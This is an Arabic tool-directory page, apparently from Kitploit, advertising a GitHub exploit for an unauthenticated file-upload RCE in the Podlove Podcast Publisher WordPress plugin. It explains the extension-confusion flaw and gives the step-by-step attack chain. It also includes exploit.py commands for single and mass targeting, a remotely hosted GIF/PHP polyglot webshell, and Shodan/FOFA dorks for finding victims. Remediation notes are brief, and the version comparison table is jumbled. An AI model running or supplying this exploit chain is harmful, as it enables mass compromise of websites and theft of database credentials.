Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-13001 | Kitploit
أدوات/GitHubGitHub/ghostpels/cve-2026-13001
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHubghostpels/cve-2026-13001

CVE-2026-13001

عرض المستودع
منذ 29 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-13001

Podlove Podcast Publisher <= 4.5.1 — تنفيذ تعليمات برمجية عن بُعد (RCE) بدون مصادقة عبر الخلط بين الامتدادات

CVSS 9.8 (حرج) | رفع ملفات تعسفي بدون مصادقة يؤدي إلى تنفيذ تعليمات برمجية عن بُعد


نظرة عامة

ثغرة حرجة في مكوّن ووردبريس الإضافي Podlove Podcast Publisher (الإصدارات حتى 4.5.1) تتيح للمهاجمين غير المصادَق عليهم رفع ملفات PHP تعسفية إلى الخادم عبر وظيفة ذاكرة التخزين المؤقت للصور، الأمر الذي يؤدي إلى تنفيذ تعليمات برمجية عن بُعد (RCE).

تستغل الثغرة عدم تطابق بين وظيفتين داخليتين تحللان امتدادات الملفات بشكل مختلف:

الدالةالطريقةالإدخال: payload.php?.gifالنتيجة
is_image()basename() ثم pathinfo()payload.php?.gif.gif (يجتاز التحقق)
extract_file_extension()parse_url() ثم pathinfo()/payload.php.php (يُحفظ على القرص)

تفاصيل الثغرة


تحليل السبب الجذري

توجد الثغرة لأن وظيفتين في مكوّن بودلوف الإضافي تحللان نفس عنوان URL لكنهما تستخرجان امتدادات ملفات مختلفة:

1. is_image() — التحقق (في lib/helper.php)

root@kitploit:~
// Called with: is_image($temp_file, basename($this->source_url))
// basename("https://attacker.com/payload.php?.gif") returns "payload.php?.gif"
// pathinfo("payload.php?.gif", PATHINFO_EXTENSION) returns "gif"  <- BYPASS!

تتحقق الدالة من:

  • فحص قائم على المحتوى عبر exif_imagetype() - يتطلب ترويسة صورة صالحة (GIF89a)
  • فحص نوع ملف ووردبريس عبر wp_check_filetype_and_ext()
  • قائمة حظر الامتدادات (php, php3, php4, php5, phtml, phar, إلخ.)

بما أن basename() يشمل سلسلة الاستعلام، يظهر الامتداد على أنه gif - وهو غير مدرج في قائمة الحظر.

2. extract_file_extension() — تسمية الملف (في lib/model/image.php)

root@kitploit:~
// parse_url("https://attacker.com/payload.php?.gif")
// path = "/payload.php"  (query string stripped!)
// pathinfo("/payload.php", PATHINFO_EXTENSION) returns "php"

يُحفظ الملف على القرص بامتداد .php.


سلسلة الهجوم

root@kitploit:~
1. يستضيف المهاجم ملف GIF89a PHP متعدد اللغات على: attacker.com/payload.php
   (يبدأ الملف بترويسة GIF89a لكنه يحتوي على كود PHP)

2. يلحق الاستغلال ?.gif بعنوان URL: payload.php?.gif
   ثم يرمّز عنوان URL الكامل بالنظام الست عشري

3. تشغيل تنزيل ذاكرة التخزين المؤقت:
   GET /?podlove_image_cache_url={hex_encoded_url}&podlove_file_name=test

4. معالجة المكوّن الإضافي:
   a. تنزيل الملف من عنوان URL الخاص بالمهاجم
   b. يفحص is_image() المحتوى: تم اكتشاف ترويسة GIF89a - PASS
   c. يفحص is_image() الامتداد: يرى basename "gif" - PASS
   d. يستخدم extract_file_extension() مسار parse_url: يحصل على "php"
   e. يُحفظ الملف باسم: test_original.php

5. موقع الملف:
   /wp-content/cache/podlove/{hash[:2]}/{hash[2:]}/test_original.php

6. يصل المهاجم إلى الملف مع المعاملات -> تحقيق RCE

التثبيت

root@kitploit:~
git clone https://github.com/ghostpel-sec/CVE-2026-13001.git
cd CVE-2026-13001
pip install -r requirements.txt

الاستخدام

هدف واحد

root@kitploit:~
python3 exploit.py -u http://target.com \
  -s https://yourserver.com/shell_polyglot.gif.php \
  --filename test -v

فحص جماعي

root@kitploit:~
python3 exploit.py -f targets.txt \
  -s https://yourserver.com/shell_polyglot.gif.php \
  -o vuln.txt -t 15 -v

الوضع التفاعلي (وصول مباشر إلى الملف المرفوع)

root@kitploit:~
python3 exploit.py --shell-url http://target.com/wp-content/cache/podlove/a1/b2c3.../test_original.php

وضع التصحيح

root@kitploit:~
python3 exploit.py -u http://target.com \
  -s https://yourserver.com/shell_polyglot.gif.php \
  --filename test --debug

الخيارات

root@kitploit:~
-u, --url          Single target URL
-f, --file         File containing target URLs (one per line)
-s, --shell        URL hosting the GIF89a PHP polyglot
--filename         Custom filename for cached file (default: shell)
--shell-url        Direct URL for interactive mode
-o, --output       Output file for vulnerable targets (bulk mode)
-t, --threads      Number of threads (default: 10)
-v, --verbose      Verbose output
--debug            Debug output (show all HTTP requests)
--no-payload-test  Skip payload accessibility test

الحمولة: ملف GIF89a PHP متعدد اللغات

ملف shell_polyglot.gif.php هو ملف متعدد اللغات صالح كصورة GIF وكتعليمات PHP معًا:

root@kitploit:~
GIF89a        <- Valid GIF header (passes exif_imagetype check)
/*            <- Start of comment (GIF binary data is commented out for PHP)

<?php         <- PHP code begins here
// ... code ...
?>

مهم: يجب استضافة الملف متعدد اللغات كـملف ثابت (مثل: Cloudflare R2 أو AWS S3 أو nginx بدون PHP). إذا كان خادم الاستضافة يعالج PHP، فسيتم تنفيذ الكود على خادم الاستضافة بدلاً من تسليمه كمحتوى خام إلى الهدف.


FOFA / Shodan / ZoomEye

root@kitploit:~
# FOFA
body="podlove-podcasting-plugin-for-wordpress"

# Shodan
http.html:"podlove"

# ZoomEye
app:"Podlove Podcast Publisher"

التأثير

يؤدي الاستغلال الناجح إلى تنفيذ تعليمات برمجية عن بُعد بصلاحية مستخدم خادم الويب:

  • استخراج بيانات اعتماد قاعدة البيانات من wp-config.php
  • الوصول إلى جميع مستخدمي ووردبريس والمقالات وبيانات المكوّنات الإضافية
  • نشر آليات وصول دائمة
  • الانتقال إلى الشبكات الداخلية
  • اختراق كامل للخادم

المعالجة

  1. حدّث إلى Podlove Podcast Publisher 4.5.2 أو أحدث
  2. احذف محتويات مجلد wp-content/cache/podlove/
  3. دقّق الخادم بحثًا عن ملفات PHP غير معروفة في مجلدات ذاكرة التخزين المؤقت
  4. راقب سجلات الوصول بحثًا عن طلبات podlove_image_cache_url مشبوهة

العلاقة مع CVE-2025-10147

هذه الثغرة هي تجاوز للإصلاح المُطبَّق على CVE-2025-10147 (Podlove <= 4.2.6).

الجانبCVE-2025-10147 (v4.2.6)CVE-2026-13001 (v4.5.1)
السبب الجذري

راجع analysis/CVE_COMPARISON.md للحصول على مقارنة تفصيلية.


المراجع

  • إشعار Wordfence
  • التزام الإصلاح على GitHub
  • صفحة المكوّن الإضافي على ووردبريس
  • إدخال NVD

إخلاء المسؤولية

لأغراض تعليمية وللاختبارات المصرَّح بها فقط.

هذه الأداة مخصصة لباحثي الأمن ومختبري الاختراق الذين لديهم تفويض كتابي صريح لاختبار الأنظمة المستهدفة. الوصول غير المصرَّح به إلى أنظمة الكمبيوتر غير قانوني. لا يتحمل المؤلفون أي مسؤولية عن إساءة استخدام هذه الأداة.


المؤلف

ghostpel-sec — البحث الأمني وتطوير الاستغلالات

الترخيص

هذا المشروع مرخّص بموجب رخصة ghostpel-sec للبحث الأمني.

تنزيل الأداة
الحقلالقيمة
CVE IDCVE-2026-13001
CVSS9.8 (حرج)
CWECWE-20 (تحقق غير سليم من الإدخال)
المكوّن الإضافيPodlove Podcast Publisher
الإصدارات المتأثرةالإصدارات حتى 4.5.1
الإصدار المُصحَّح4.5.2
النوعرفع ملفات تعسفي بدون مصادقة يؤدي إلى RCE
الباحثTalal Nasraddeen (عبر Wordfence)
تاريخ النشر14 يوليو 2026
لا يوجد أي تحقق من نوع الملف على الإطلاق
تجاوز للتحقق عبر الخلط بين الامتدادات
الأسلوبرفع ملف PHP مباشرملف GIF89a متعدد اللغات + خدعة استعلام URL
الإصلاح المطبقإضافة is_image() مع قائمة حظرإصلاح اتساق تحليل الامتدادات